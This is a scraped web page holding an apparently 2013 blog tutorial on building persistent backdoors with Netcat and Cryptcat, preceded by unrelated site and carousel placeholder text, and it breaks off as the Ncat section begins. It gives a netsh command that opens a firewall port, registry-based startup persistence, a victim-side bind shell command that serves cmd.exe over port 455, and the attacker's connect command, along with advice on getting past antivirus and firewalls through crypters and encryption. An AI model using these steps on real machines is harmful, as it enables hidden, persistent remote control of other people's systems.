platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
Backdoor using Netcat, cryptcat , ncat.
published on 2013-10-24 12:00:00 UTC by nirav desai Content:
Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here. Also i assume that you have already open port 455 using following command.
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
Attacker `s I.P : 192.168.56.1
Victim`s I.P. : 192.168.56.101
We will talk about Netcat, cryptcat & ncat.
(A)Netcat:-
Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start netcat listener. Here is tutorial on how to create netcat backdoor?
But if you know about method used in that tutorial ; there are some disadvantages of using netcat.
(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection possible by AV.
(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.
(3)No authentication:- anyone can start listner to connect back to our backdoor , because there is no mechanism to verify that user are authorized or not.
(B)Cryptcat:-
Cryptcat is same as netcat but in advanced it provide encryption & authentication mechanism.
How to install cryptcat?
In case of backtrack , apt-get install cryptcat .
If you are in other linux OS , then you have to manually installed it from source ; because in repository it does not come with e option , so we can not bind any program to it.
unzip it , change directory & enter following command
make unix
To make exe(windows compatible) from source , use visual studio.
root@bt:~# cryptcat -h [v1.10] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -e prog program to exec after connect [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -k secret set the shared secret -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning]
Most of options are same as netcat, but look at new option as -k , it provide password for communication.
On victim machine type following command
cryptcat -Ldp 455 -e cmd.exe
On attacker side , setup listner
cryptcat 192.168.56.101 455
Look at following figure ; where we capture traffic using wireshark ; it`s encrypted.
You can also provide -k option for authentication.So in case of cryptcat we got authentication & encryption.
Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat.Ncat come with nmap , so in attacker side we have already installed ncat.